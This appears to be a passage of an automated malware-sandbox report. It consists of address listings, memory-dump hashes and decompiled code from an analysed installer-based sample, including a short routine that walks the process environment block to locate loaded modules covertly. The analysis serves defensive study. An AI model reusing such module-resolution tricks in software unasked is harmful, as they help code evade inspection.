                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004072e4
                                                                                                                                                                                                          0x004072e9
                                                                                                                                                                                                          0x004072ec
                                                                                                                                                                                                          0x004072ee
                                                                                                                                                                                                          0x004072ee
                                                                                                                                                                                                          0x004072f4
                                                                                                                                                                                                          0x004072f6
                                                                                                                                                                                                          0x00407307
                                                                                                                                                                                                          0x004072fa
                                                                                                                                                                                                          0x004072fe
                                                                                                                                                                                                          0x004075a3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004075a3
                                                                                                                                                                                                          0x00407304
                                                                                                                                                                                                          0x00407305
                                                                                                                                                                                                          0x00407305
                                                                                                                                                                                                          0x0040730d
                                                                                                                                                                                                          0x00407310
                                                                                                                                                                                                          0x00407314
                                                                                                                                                                                                          0x00407316
                                                                                                                                                                                                          0x00407318
                                                                                                                                                                                                          0x0040731b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407323
                                                                                                                                                                                                          0x00407329
                                                                                                                                                                                                          0x0040732b
                                                                                                                                                                                                          0x0040732d
                                                                                                                                                                                                          0x0040732e
                                                                                                                                                                                                          0x00407343
                                                                                                                                                                                                          0x00407343
                                                                                                                                                                                                          0x00407346
                                                                                                                                                                                                          0x00407348
                                                                                                                                                                                                          0x00407348
                                                                                                                                                                                                          0x0040734a
                                                                                                                                                                                                          0x0040734f
                                                                                                                                                                                                          0x00407351
                                                                                                                                                                                                          0x00407358
                                                                                                                                                                                                          0x0040735a
                                                                                                                                                                                                          0x00407362
                                                                                                                                                                                                          0x00407362
                                                                                                                                                                                                          0x00407364
                                                                                                                                                                                                          0x00407365
                                                                                                                                                                                                          0x00407374
                                                                                                                                                                                                          0x00407378
                                                                                                                                                                                                          0x0040737c
                                                                                                                                                                                                          0x0040737f
                                                                                                                                                                                                          0x00407382
                                                                                                                                                                                                          0x00407387
                                                                                                                                                                                                          0x0040738a
                                                                                                                                                                                                          0x00407390
                                                                                                                                                                                                          0x00407397
                                                                                                                                                                                                          0x0040739d
                                                                                                                                                                                                          0x00407596
                                                                                                                                                                                                          0x00407596
                                                                                                                                                                                                          0x0040759b
                                                                                                                                                                                                          0x004075aa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040759b
                                                                                                                                                                                                          0x004073aa
                                                                                                                                                                                                          0x004073ad
                                                                                                                                                                                                          0x004073b0
                                                                                                                                                                                                          0x004073b3
                                                                                                                                                                                                          0x004073b7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073c2
                                                                                                                                                                                                          0x004073c5
                                                                                                                                                                                                          0x004073c6
                                                                                                                                                                                                          0x004073c8
                                                                                                                                                                                                          0x004073ce
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073d7
                                                                                                                                                                                                          0x004073d8
                                                                                                                                                                                                          0x004073db
                                                                                                                                                                                                          0x004073de
                                                                                                                                                                                                          0x004073e1
                                                                                                                                                                                                          0x004073e7
                                                                                                                                                                                                          0x004073e9
                                                                                                                                                                                                          0x004073e9
                                                                                                                                                                                                          0x004073f1
                                                                                                                                                                                                          0x004073f5
                                                                                                                                                                                                          0x004073fa
                                                                                                                                                                                                          0x0040741f
                                                                                                                                                                                                          0x00407425
                                                                                                                                                                                                          0x00407427
                                                                                                                                                                                                          0x00407429
                                                                                                                                                                                                          0x0040742c
                                                                                                                                                                                                          0x00407435
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                          0x00407405
                                                                                                                                                                                                          0x00407409
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040741d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040740d
                                                                                                                                                                                                          0x00407410
                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                          0x00407416
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407418
                                                                                                                                                                                                          0x00407418
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                          0x0040743e
                                                                                                                                                                                                          0x00407444
                                                                                                                                                                                                          0x0040744e
                                                                                                                                                                                                          0x00407450
                                                                                                                                                                                                          0x00407455
                                                                                                                                                                                                          0x00407457
                                                                                                                                                                                                          0x0040748d
                                                                                                                                                                                                          0x00407459
                                                                                                                                                                                                          0x00407459
                                                                                                                                                                                                          0x0040745c
                                                                                                                                                                                                          0x0040745f
                                                                                                                                                                                                          0x00407469
                                                                                                                                                                                                          0x0040746c
                                                                                                                                                                                                          0x00407473
                                                                                                                                                                                                          0x0040747e
                                                                                                                                                                                                          0x00407485
                                                                                                                                                                                                          0x00407485
                                                                                                                                                                                                          0x0040748f
                                                                                                                                                                                                          0x00407492
                                                                                                                                                                                                          0x00407494
                                                                                                                                                                                                          0x0040749a
                                                                                                                                                                                                          0x0040749a
                                                                                                                                                                                                          0x004074a3
                                                                                                                                                                                                          0x004074a6
                                                                                                                                                                                                          0x004074ab
                                                                                                                                                                                                          0x004074ba
                                                                                                                                                                                                          0x004074c2
                                                                                                                                                                                                          0x004074c7
                                                                                                                                                                                                          0x004074eb
                                                                                                                                                                                                          0x004074f3
                                                                                                                                                                                                          0x004074f7
                                                                                                                                                                                                          0x004074fd
                                                                                                                                                                                                          0x004074c9
                                                                                                                                                                                                          0x004074d7
                                                                                                                                                                                                          0x004074da
                                                                                                                                                                                                          0x004074e0
                                                                                                                                                                                                          0x004074e0
                                                                                                                                                                                                          0x00407501
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x004074bc
                                                                                                                                                                                                          0x00407512
                                                                                                                                                                                                          0x00407516
                                                                                                                                                                                                          0x00407522
                                                                                                                                                                                                          0x0040751d
                                                                                                                                                                                                          0x00407520
                                                                                                                                                                                                          0x00407520
                                                                                                                                                                                                          0x0040752a
                                                                                                                                                                                                          0x0040752f
                                                                                                                                                                                                          0x00407537
                                                                                                                                                                                                          0x00407533
                                                                                                                                                                                                          0x00407535
                                                                                                                                                                                                          0x00407535
                                                                                                                                                                                                          0x0040753d
                                                                                                                                                                                                          0x0040753f
                                                                                                                                                                                                          0x00407546
                                                                                                                                                                                                          0x00407550
                                                                                                                                                                                                          0x0040755a
                                                                                                                                                                                                          0x00407576
                                                                                                                                                                                                          0x0040757a
                                                                                                                                                                                                          0x004073bf
                                                                                                                                                                                                          0x004073c5
                                                                                                                                                                                                          0x004073c6
                                                                                                                                                                                                          0x004073c8
                                                                                                                                                                                                          0x004073ce
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x0040755c
                                                                                                                                                                                                          0x00407561
                                                                                                                                                                                                          0x0040756a
                                                                                                                                                                                                          0x00407573
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407573
                                                                                                                                                                                                          0x00407580
                                                                                                                                                                                                          0x00407580
                                                                                                                                                                                                          0x00407583
                                                                                                                                                                                                          0x0040758a
                                                                                                                                                                                                          0x0040758d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004073b0
                                                                                                                                                                                                          0x00407330
                                                                                                                                                                                                          0x00407332
                                                                                                                                                                                                          0x00407332
                                                                                                                                                                                                          0x00407336
                                                                                                                                                                                                          0x00407339
                                                                                                                                                                                                          0x0040733a
                                                                                                                                                                                                          0x0040733a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407332
                                                                                                                                                                                                          0x004072a6
                                                                                                                                                                                                          0x004072ac
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                                                                                                                                          • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F478F, Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F478F(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E722F46D3(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}








                                                                                                                                                                                                          0x722f479b
                                                                                                                                                                                                          0x722f47a4
                                                                                                                                                                                                          0x722f47ad
                                                                                                                                                                                                          0x722f47b6
                                                                                                                                                                                                          0x722f47b9
                                                                                                                                                                                                          0x722f47d8
                                                                                                                                                                                                          0x722f47e1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f47e3
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                                                                                                                          • Instruction ID: b9dba4b9d3425fee707ce9304fa816247cf8dd0826b209feb6c0f078cc711074
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16010C78A11209EFCB41DF99C580E9DFBF5EB09220B118595E915E7715E370EE50DB40
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F458C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F458C() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                                                                                                                                                          0x722f45a3

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                                                                                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x590f48
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                                                                                                          0x00404cf4
                                                                                                                                                                                                          0x00404cfc
                                                                                                                                                                                                          0x00404d04
                                                                                                                                                                                                          0x00404d0a
                                                                                                                                                                                                          0x00404d22
                                                                                                                                                                                                          0x00404d25
                                                                                                                                                                                                          0x00404d26
                                                                                                                                                                                                          0x00404f53
                                                                                                                                                                                                          0x00404f5a
                                                                                                                                                                                                          0x00404f6e
                                                                                                                                                                                                          0x00404f5c
                                                                                                                                                                                                          0x00404f5e
                                                                                                                                                                                                          0x00404f61
                                                                                                                                                                                                          0x00404f62
                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                          0x00404f7a
                                                                                                                                                                                                          0x00404f88
                                                                                                                                                                                                          0x00404f8b
                                                                                                                                                                                                          0x00404fa1
                                                                                                                                                                                                          0x00405016
                                                                                                                                                                                                          0x00405019
                                                                                                                                                                                                          0x0040501b
                                                                                                                                                                                                          0x00405025
                                                                                                                                                                                                          0x00405033
                                                                                                                                                                                                          0x00405033
                                                                                                                                                                                                          0x00405035
                                                                                                                                                                                                          0x0040503f
                                                                                                                                                                                                          0x00405045
                                                                                                                                                                                                          0x00405048
                                                                                                                                                                                                          0x0040504b
                                                                                                                                                                                                          0x00405066
                                                                                                                                                                                                          0x0040504d
                                                                                                                                                                                                          0x00405057
                                                                                                                                                                                                          0x00405057
                                                                                                                                                                                                          0x0040504b
                                                                                                                                                                                                          0x0040503f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405019
                                                                                                                                                                                                          0x00404fa6
                                                                                                                                                                                                          0x00404fb1
                                                                                                                                                                                                          0x00404fb6
                                                                                                                                                                                                          0x00404fbd
                                                                                                                                                                                                          0x00404fc2
                                                                                                                                                                                                          0x00404fc6
                                                                                                                                                                                                          0x00404fd1
                                                                                                                                                                                                          0x00404fd1
                                                                                                                                                                                                          0x00404fd5
                                                                                                                                                                                                          0x00404fd9
                                                                                                                                                                                                          0x00404fdd
                                                                                                                                                                                                          0x00404ff0
                                                                                                                                                                                                          0x00404fdf
                                                                                                                                                                                                          0x00404fdf
                                                                                                                                                                                                          0x00404fe6
                                                                                                                                                                                                          0x00404fec
                                                                                                                                                                                                          0x00404fe8
                                                                                                                                                                                                          0x00404fe8
                                                                                                                                                                                                          0x00404fe8
                                                                                                                                                                                                          0x00404fe6
                                                                                                                                                                                                          0x00404ff4
                                                                                                                                                                                                          0x00404ff6
                                                                                                                                                                                                          0x00405009
                                                                                                                                                                                                          0x0040500c
                                                                                                                                                                                                          0x0040500f
                                                                                                                                                                                                          0x0040500f
                                                                                                                                                                                                          0x00404fd9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404fc6
                                                                                                                                                                                                          0x00404fa8
                                                                                                                                                                                                          0x00404faf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405069
                                                                                                                                                                                                          0x00405069
                                                                                                                                                                                                          0x00405070
                                                                                                                                                                                                          0x004050e1
                                                                                                                                                                                                          0x004050e9
                                                                                                                                                                                                          0x004050f1
                                                                                                                                                                                                          0x004050f1
                                                                                                                                                                                                          0x004050fa
                                                                                                                                                                                                          0x004050fc
                                                                                                                                                                                                          0x00405103
                                                                                                                                                                                                          0x00405106
                                                                                                                                                                                                          0x00405106
                                                                                                                                                                                                          0x0040510c
                                                                                                                                                                                                          0x00405113
                                                                                                                                                                                                          0x00405116
                                                                                                                                                                                                          0x00405116
                                                                                                                                                                                                          0x0040511c
                                                                                                                                                                                                          0x00405122
                                                                                                                                                                                                          0x00405128
                                                                                                                                                                                                          0x00405128
                                                                                                                                                                                                          0x00405135
                                                                                                                                                                                                          0x00405295
                                                                                                                                                                                                          0x0040529c
                                                                                                                                                                                                          0x004052b9
                                                                                                                                                                                                          0x004052bf
                                                                                                                                                                                                          0x004052d1
                                                                                                                                                                                                          0x004052d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040513b
                                                                                                                                                                                                          0x0040513d
                                                                                                                                                                                                          0x00405142
                                                                                                                                                                                                          0x00405147
                                                                                                                                                                                                          0x0040514c
                                                                                                                                                                                                          0x0040514e
                                                                                                                                                                                                          0x0040514e
                                                                                                                                                                                                          0x0040514f
                                                                                                                                                                                                          0x00405150
                                                                                                                                                                                                          0x00405152
                                                                                                                                                                                                          0x00405152
                                                                                                                                                                                                          0x0040515a
                                                                                                                                                                                                          0x0040519b
                                                                                                                                                                                                          0x0040519d
                                                                                                                                                                                                          0x004051ad
                                                                                                                                                                                                          0x004051b0
                                                                                                                                                                                                          0x004051b5
                                                                                                                                                                                                          0x004051bc
                                                                                                                                                                                                          0x004051bf
                                                                                                                                                                                                          0x00405261
                                                                                                                                                                                                          0x00405269
                                                                                                                                                                                                          0x00405271
                                                                                                                                                                                                          0x00405271
